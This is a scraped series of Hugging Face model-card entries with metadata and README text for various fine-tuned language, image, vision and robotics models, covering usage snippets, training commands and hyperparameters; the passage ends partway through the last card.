"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T13:31:34Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64-0922195521-epoch-8", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/09vdah42)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
StrategyAI/strategy-neon-krea
|
StrategyAI
| 2025-09-23T14:42:19Z | 0 | 0 |
diffusers
|
[
"diffusers",
"text-to-image",
"lora",
"template:diffusion-lora",
"base_model:black-forest-labs/FLUX.1-Krea-dev",
"base_model:adapter:black-forest-labs/FLUX.1-Krea-dev",
"region:us"
] |
text-to-image
| 2025-09-23T14:40:48Z |
---
tags:
- text-to-image
- lora
- diffusers
- template:diffusion-lora
widget:
- output:
url: images/neon-krea-1.jpg
text: 'A dolphin glowing with neon orange light leaping gracefully from dark midnight waters under a starry sky. The sea reflects shimmering orange neon trails, symbolizing strategy and flow futuristic and mysterious.'
- output:
url: images/neon-krea-2.jpg
text: 'A glowing orange fruit glitches into fragments of neon pixels and cascading streams of electric code. Seeds transform into sleek glowing tokens, orbiting like satellites with neon trails. The background is a futuristic cyber skyline with dark indigo skies, glowing circuits, and electric orange highlights.'
- output:
url: images/neon-krea-3.jpg
text: 'a cheetah running through neon lit city streets, orange and amber tiles for the cheetah the night sky above filled with stars and glowing orange galaxy patterns reflections on wet pavement artistic mosaic style with cosmic and urban fusion'
- output:
url: images/neon-krea-4.jpg
text: 'A dark futuristic background with a glowing neon pathway leading into the horizon illuminated with radiant orange and subtle blue neon lights. The pathway appears three dimensional surrounded by abstract digital light effects and faint glowing grids. Inspirational and motivational theme elegant and professional high resolution'
- output:
url: images/neon-krea-5.jpg
text: 'an orange shiny futuristic city in the night, pedestrians wearing orange neon outfit, cinematic, shot on film, detailed textures'
- output:
url: images/neon-krea-6.jpg
text: 'Rolling desert dunes under a deep orange sky long shadows stretching across sand cinematic and the warm glow moody and tranquil highly detailed.'
base_model: black-forest-labs/FLUX.1-Krea-dev
instance_prompt: NeonPainterKrea
---
# strategy-neon-krea
<Gallery />
## Model description
strategy-neon-krea is a FLUX.1-Krea-dev LoRA based on Strategy Neon imagery.
## Try the model
You can try the model on our [Discord Server](https://discord.gg/qNNYyztXes)
## Trigger words
You should use `NeonPainterKrea` to trigger the image generation.
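As a minimal usage sketch (assuming `diffusers` with FLUX support, a CUDA GPU, and access to the gated base model; the prompt and sampling parameters are illustrative):

```python
import torch
from diffusers import FluxPipeline

# Load the FLUX.1-Krea-dev base pipeline (gated: requires accepting its license).
pipe = FluxPipeline.from_pretrained(
    "black-forest-labs/FLUX.1-Krea-dev", torch_dtype=torch.bfloat16
).to("cuda")

# Attach the strategy-neon-krea LoRA weights from this repository.
pipe.load_lora_weights("StrategyAI/strategy-neon-krea")

# Include the trigger word in the prompt.
image = pipe(
    "NeonPainterKrea, a glowing orange neon skyline at night, cinematic",
    num_inference_steps=28,
    guidance_scale=3.5,
).images[0]
image.save("neon-krea.png")
```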
## Download model
[Download](/StrategyAI/strategy-neon-krea/tree/main) the weights from the Files & versions tab.
## License
This model falls under the [FLUX.1 [dev] Non-Commercial License](https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md).
|
onnxmodelzoo/resnext101_32x8d_Opset16
|
onnxmodelzoo
| 2025-09-23T14:42:18Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:41:58Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x8d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x4d_Opset17
|
onnxmodelzoo
| 2025-09-23T14:41:47Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:41:36Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x4d_Opset17.onnx
tags:
- Computer_Vision
---
|
septemberendto/Qwen3-0.6B-Gensyn-Swarm-nimble_scaly_walrus
|
septemberendto
| 2025-09-23T14:41:15Z | 95 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am nimble_scaly_walrus",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-20T19:13:42Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am nimble_scaly_walrus
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
onnxmodelzoo/resnetv2_50x1_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:41:09Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:40:56Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50x1_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset18
|
onnxmodelzoo
| 2025-09-23T14:39:47Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:39Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset16
|
onnxmodelzoo
| 2025-09-23T14:39:29Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:19Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset16.onnx
tags:
- Computer_Vision
---
|
mawiie/SmolLM3-3B-Base-Plain
|
mawiie
| 2025-09-23T14:39:28Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"sft",
"trl",
"base_model:HuggingFaceTB/SmolLM3-3B-Base",
"base_model:finetune:HuggingFaceTB/SmolLM3-3B-Base",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T13:04:35Z |
---
base_model: HuggingFaceTB/SmolLM3-3B-Base
library_name: transformers
model_name: SmolLM3-3B-Base-Plain
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for SmolLM3-3B-Base-Plain
This model is a fine-tuned version of [HuggingFaceTB/SmolLM3-3B-Base](https://huggingface.co/HuggingFaceTB/SmolLM3-3B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="mawiie/SmolLM3-3B-Base-Plain", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/resnetv2_50d_evos_Opset17
|
onnxmodelzoo
| 2025-09-23T14:39:19Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:11Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_evos_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50_Opset16
|
onnxmodelzoo
| 2025-09-23T14:38:45Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:38:37Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50_Opset16.onnx
tags:
- Computer_Vision
---
|
Emil7018/classifier-chapter4
|
Emil7018
| 2025-09-23T14:36:54Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:google-bert/bert-base-uncased",
"base_model:finetune:google-bert/bert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-22T16:35:54Z |
---
library_name: transformers
license: apache-2.0
base_model: bert-base-uncased
tags:
- generated_from_trainer
model-index:
- name: classifier-chapter4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# classifier-chapter4
This model is a fine-tuned version of [bert-base-uncased](https://huggingface.co/bert-base-uncased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: AdamW (torch, fused) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Framework versions
- Transformers 4.56.2
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
pepijn223/pi05_libero
|
pepijn223
| 2025-09-23T14:36:23Z | 64 | 1 | null |
[
"safetensors",
"region:us"
] | null | 2025-09-09T15:23:56Z |
# π₀.₅ (Pi05) Libero
π₀.₅ is a **Vision-Language-Action model with open-world generalization**, from Physical Intelligence. The LeRobot implementation is adapted from their open source [OpenPI](https://github.com/Physical-Intelligence/openpi) repository.
## Model Overview
π₀.₅ represents a significant evolution from π₀, developed by [Physical Intelligence](https://www.physicalintelligence.company/blog/pi05) to address a central challenge in robotics: **open-world generalization**. While robots can perform impressive tasks in controlled environments, π₀.₅ is designed to generalize to entirely new environments and situations that were never seen during training.
### The Generalization Challenge
As Physical Intelligence explains, the fundamental challenge isn't raw agility or dexterity but generalization: the ability to correctly perform tasks in new settings with new objects. Consider a robot cleaning different homes: each home has different objects in different places. Generalization must occur at multiple levels:
- **Physical Level**: Understanding how to pick up a spoon (by the handle) or plate (by the edge), even with unseen objects in cluttered environments
- **Semantic Level**: Understanding task semantics, where to put clothes and shoes (laundry hamper, not on the bed), and what tools are appropriate for cleaning spills
- **Environmental Level**: Adapting to "messy" real-world environments like homes, grocery stores, offices, and hospitals
### Co-Training on Heterogeneous Data
The breakthrough innovation in π₀.₅ is **co-training on heterogeneous data sources**. The model learns from:
1. **Multimodal Web Data**: Image captioning, visual question answering, object detection
2. **Verbal Instructions**: Humans coaching robots through complex tasks step-by-step
3. **Subtask Commands**: High-level semantic behavior labels (e.g., "pick up the pillow" for an unmade bed)
4. **Cross-Embodiment Robot Data**: Data from various robot platforms with different capabilities
5. **Multi-Environment Data**: Static robots deployed across many different homes
6. **Mobile Manipulation Data**: ~400 hours of mobile robot demonstrations
This diverse training mixture creates a "curriculum" that enables generalization across physical, visual, and semantic levels simultaneously.
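The published description does not include the exact mixture weights; the sketch below is only an illustration of weighted sampling across such sources, with invented weights:

```python
import random

# Hypothetical mixture weights over the sources listed above
# (invented for illustration; the actual pi0.5 weights are not given here).
MIXTURE = {
    "web_multimodal": 0.30,
    "verbal_instructions": 0.10,
    "subtask_commands": 0.15,
    "cross_embodiment_robot": 0.20,
    "multi_environment": 0.15,
    "mobile_manipulation": 0.10,
}

def sample_source_names(batch_size: int = 32) -> list[str]:
    """Pick the source each example in a batch is drawn from,
    in proportion to the mixture weights."""
    names = list(MIXTURE)
    weights = [MIXTURE[n] for n in names]
    return random.choices(names, weights=weights, k=batch_size)

print(sample_source_names(8))
```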
## Training
Here's a complete training command for finetuning the base π₀.₅ model on your own dataset:
```bash
python src/lerobot/scripts/train.py \
--dataset.repo_id=your_dataset \
--policy.type=pi05 \
--output_dir=./outputs/pi05_training \
--job_name=pi05_training \
--policy.pretrained_path=pepijn223/pi05_libero \
--policy.repo_id=your_repo_id \
--policy.compile_model=true \
--policy.gradient_checkpointing=true \
--wandb.enable=true \
--policy.dtype=bfloat16 \
--steps=3000 \
--policy.scheduler_decay_steps=3000 \
--policy.device=cuda \
--batch_size=32
```
## Conversion Details
This model was converted from JAX to PyTorch using the OpenPI conversion script:
```bash
python examples/convert_jax_model_to_pytorch.py \
--checkpoint_dir /pi05_libero \
--config_name pi05_libero \
--output_path /pi05_base/pytorch/fp32/ \
--precision float32
```
## Citation
If you use this model, please cite the original OpenPI work:
```bibtex
@article{openpi2024,
title={Open-World Robotic Manipulation with Vision-Language-Action Models},
author={Physical Intelligence},
year={2024},
url={https://github.com/Physical-Intelligence/openpi}
}
```
## Original Repository
[OpenPI GitHub Repository](https://github.com/Physical-Intelligence/openpi)
## License
This model follows the same license as the original OpenPI repository.
|
pepijn223/pi0_libero
|
pepijn223
| 2025-09-23T14:35:48Z | 117 | 1 | null |
[
"safetensors",
"region:us"
] | null | 2025-09-09T15:22:46Z |
# π₀ (Pi0) Libero
π₀ is a **Vision-Language-Action model for general robot control**, from Physical Intelligence. The LeRobot implementation is adapted from their open source [OpenPI](https://github.com/Physical-Intelligence/openpi) repository.
## Model Overview
π₀ represents a breakthrough in robotics as the first general-purpose robot foundation model developed by [Physical Intelligence](https://www.physicalintelligence.company/blog/pi0). Unlike traditional robots that are narrow specialists programmed for repetitive motions, π₀ is designed to be a generalist policy that can understand visual inputs, interpret natural language instructions, and control a variety of different robots across diverse tasks.
### The Vision for Physical Intelligence
As described by Physical Intelligence, while AI has achieved remarkable success in digital domains, from chess-playing to drug discovery, human intelligence still dramatically outpaces AI in the physical world. To paraphrase Moravec's paradox, winning a game of chess represents an "easy" problem for AI, but folding a shirt or cleaning up a table requires solving some of the most difficult engineering problems ever conceived. π₀ represents a first step toward developing artificial physical intelligence that enables users to simply ask robots to perform any task they want, just like they can with large language models.
### Architecture and Approach
π₀ combines several key innovations:
- **Flow Matching**: Uses a novel method to augment pre-trained VLMs with continuous action outputs via flow matching (a variant of diffusion models); see the sketch after this list
- **Cross-Embodiment Training**: Trained on data from 8 distinct robot platforms including UR5e, Bimanual UR5e, Franka, Bimanual Trossen, Bimanual ARX, Mobile Trossen, and Mobile Fibocom
- **Internet-Scale Pre-training**: Inherits semantic knowledge from a pre-trained 3B parameter Vision-Language Model
- **High-Frequency Control**: Outputs motor commands at up to 50 Hz for real-time dexterous manipulation
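The sketch below illustrates the flow-matching objective in isolation (a toy velocity network over a straight noise-to-action path); it is not the π₀ architecture, and all shapes and names are assumptions:

```python
import torch
import torch.nn as nn

# Toy conditional flow-matching loss. The straight path
# x_t = (1 - t) * x0 + t * x1 has constant velocity (x1 - x0),
# which the network learns to regress; sampling then integrates
# the learned velocity field from noise to an action chunk.

class VelocityNet(nn.Module):
    def __init__(self, action_dim: int, hidden: int = 256):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(action_dim + 1, hidden), nn.SiLU(),
            nn.Linear(hidden, action_dim),
        )

    def forward(self, x_t: torch.Tensor, t: torch.Tensor) -> torch.Tensor:
        return self.net(torch.cat([x_t, t], dim=-1))

def flow_matching_loss(model: nn.Module, x1: torch.Tensor) -> torch.Tensor:
    x0 = torch.randn_like(x1)       # noise endpoint
    t = torch.rand(x1.shape[0], 1)  # random time in [0, 1]
    x_t = (1 - t) * x0 + t * x1     # point on the straight path
    return ((model(x_t, t) - (x1 - x0)) ** 2).mean()

model = VelocityNet(action_dim=7)
loss = flow_matching_loss(model, torch.randn(32, 7))  # fake action batch
loss.backward()
```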
## Training
For training π₀, you can use the standard LeRobot training script with the appropriate configuration:
```bash
python src/lerobot/scripts/train.py \
--dataset.repo_id=your_dataset \
--policy.type=pi0 \
--output_dir=./outputs/pi0_training \
--job_name=pi0_training \
--policy.pretrained_path=pepijn223/pi0_libero \
--policy.repo_id=your_repo_id \
--policy.compile_model=true \
--policy.gradient_checkpointing=true \
--policy.dtype=bfloat16 \
--steps=3000 \
--policy.scheduler_decay_steps=3000 \
--policy.device=cuda \
--batch_size=32
```
## Conversion Details
This model was converted from JAX to PyTorch using the OpenPI conversion script:
```bash
python examples/convert_jax_model_to_pytorch.py \
--checkpoint_dir /pi0_libero \
--config_name pi0_libero \
--output_path /pi0_base/pytorch/fp32/ \
--precision float32
```
## Citation
If you use this model, please cite the original OpenPI work:
```bibtex
@article{openpi2024,
title={Open-World Robotic Manipulation with Vision-Language-Action Models},
author={Physical Intelligence},
year={2024},
url={https://github.com/Physical-Intelligence/openpi}
}
```
## Original Repository
[OpenPI GitHub Repository](https://github.com/Physical-Intelligence/openpi)
## License
This model follows the same license as the original OpenPI repository.
|
onnxmodelzoo/resnetv2_152x2_bit_teacher_Opset17
|
onnxmodelzoo
| 2025-09-23T14:35:25Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:33:38Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bit_teacher_Opset17.onnx
tags:
- Computer_Vision
---
|
alexiaassis/Modelo-treinado
|
alexiaassis
| 2025-09-23T14:35:22Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"llama-factory",
"lora",
"unsloth",
"generated_from_trainer",
"base_model:unsloth/mistral-7b-instruct-v0.3-bnb-4bit",
"base_model:adapter:unsloth/mistral-7b-instruct-v0.3-bnb-4bit",
"license:other",
"region:us"
] | null | 2025-09-23T14:15:54Z |
---
library_name: peft
license: other
base_model: unsloth/mistral-7b-instruct-v0.3-bnb-4bit
tags:
- llama-factory
- lora
- unsloth
- generated_from_trainer
model-index:
- name: mistral-treinado
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mistral-treinado
This model is a fine-tuned version of [mistralai/Mistral-7B-Instruct-v0.3](https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.3) on the treino_pt_rde dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 3e-05
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 8
- optimizer: AdamW (torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: cosine
- num_epochs: 3.0
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- PEFT 0.15.2
- Transformers 4.52.4
- Pytorch 2.8.0+cu126
- Datasets 3.6.0
- Tokenizers 0.21.1
|
chocolat-nya/record_tag_test
|
chocolat-nya
| 2025-09-23T14:33:36Z | 0 | 0 |
lerobot
|
[
"lerobot",
"safetensors",
"act",
"robotics",
"dataset:chocolat-nya/record_tag_test",
"arxiv:2304.13705",
"license:apache-2.0",
"region:us"
] |
robotics
| 2025-09-23T08:58:37Z |
---
datasets: chocolat-nya/record_tag_test
library_name: lerobot
license: apache-2.0
model_name: act
pipeline_tag: robotics
tags:
- act
- robotics
- lerobot
---
# Model Card for act
<!-- Provide a quick summary of what the model is/does. -->
[Action Chunking with Transformers (ACT)](https://huggingface.co/papers/2304.13705) is an imitation-learning method that predicts short action chunks instead of single steps. It learns from teleoperated data and often achieves high success rates.
This policy has been trained and pushed to the Hub using [LeRobot](https://github.com/huggingface/lerobot).
See the full documentation at [LeRobot Docs](https://huggingface.co/docs/lerobot/index).
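As a conceptual illustration of chunked inference with the temporal ensembling described in the ACT paper (this is not the LeRobot API; the policy stub, horizon, and blending coefficient are assumptions):

```python
import numpy as np

CHUNK, HORIZON, ACT_DIM = 10, 50, 6
preds = [[] for _ in range(HORIZON)]  # predictions collected per timestep

def policy_stub(obs):
    """Stand-in for the learned policy: returns the next CHUNK actions."""
    return np.random.randn(CHUNK, ACT_DIM)

for t in range(HORIZON):
    chunk = policy_stub(obs=None)
    for i in range(min(CHUNK, HORIZON - t)):
        preds[t + i].append(chunk[i])  # chunks overlap across timesteps
    # Blend every chunk that covers timestep t, weighting older
    # predictions more heavily (exponential temporal ensembling).
    stacked = np.stack(preds[t])
    w = np.exp(-0.01 * np.arange(len(stacked)))
    action = (w[:, None] * stacked).sum(axis=0) / w.sum()
    # `action` would be sent to the robot here
```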
---
## How to Get Started with the Model
For a complete walkthrough, see the [training guide](https://huggingface.co/docs/lerobot/il_robots#train-a-policy).
Below is the short version on how to train and run inference/eval:
### Train from scratch
```bash
lerobot-train \
--dataset.repo_id=${HF_USER}/<dataset> \
--policy.type=act \
--output_dir=outputs/train/<desired_policy_repo_id> \
--job_name=lerobot_training \
--policy.device=cuda \
--policy.repo_id=${HF_USER}/<desired_policy_repo_id> \
--wandb.enable=true
```
_Writes checkpoints to `outputs/train/<desired_policy_repo_id>/checkpoints/`._
### Evaluate the policy/run inference
```bash
lerobot-record \
--robot.type=so100_follower \
--dataset.repo_id=<hf_user>/eval_<dataset> \
--policy.path=<hf_user>/<desired_policy_repo_id> \
--episodes=10
```
Prefix the dataset repo with **eval\_** and supply `--policy.path` pointing to a local or hub checkpoint.
---
## Model Details
- **License:** apache-2.0
|
fpadovani/cds_shuffle_np_51
|
fpadovani
| 2025-09-23T14:33:18Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gpt2",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T14:04:25Z |
---
library_name: transformers
tags:
- generated_from_trainer
model-index:
- name: cds_shuffle_np_51
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# cds_shuffle_np_51
This model is a fine-tuned version of an unspecified base model on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 3.4633
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 256
- eval_batch_size: 256
- seed: 51
- optimizer: AdamW (torch, fused) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 200
- num_epochs: 5
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| No log | 1.0 | 485 | 3.8830 |
| 4.4798 | 2.0 | 970 | 3.6370 |
| 3.4274 | 3.0 | 1455 | 3.5357 |
| 3.2156 | 4.0 | 1940 | 3.4836 |
| 3.0992 | 5.0 | 2425 | 3.4633 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu128
- Datasets 4.0.0
- Tokenizers 0.22.0
|
keemeng/Foundation_GPT_korean
|
keemeng
| 2025-09-23T14:32:37Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"sft",
"unsloth",
"trl",
"base_model:unsloth/gpt-oss-20b-unsloth-bnb-4bit",
"base_model:finetune:unsloth/gpt-oss-20b-unsloth-bnb-4bit",
"endpoints_compatible",
"region:us"
] | null | 2025-09-15T07:05:17Z |
---
base_model: unsloth/gpt-oss-20b-unsloth-bnb-4bit
library_name: transformers
model_name: Foundation_GPT_korean
tags:
- generated_from_trainer
- sft
- unsloth
- trl
licence: license
---
# Model Card for Foundation_GPT_korean
This model is a fine-tuned version of [unsloth/gpt-oss-20b-unsloth-bnb-4bit](https://huggingface.co/unsloth/gpt-oss-20b-unsloth-bnb-4bit).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
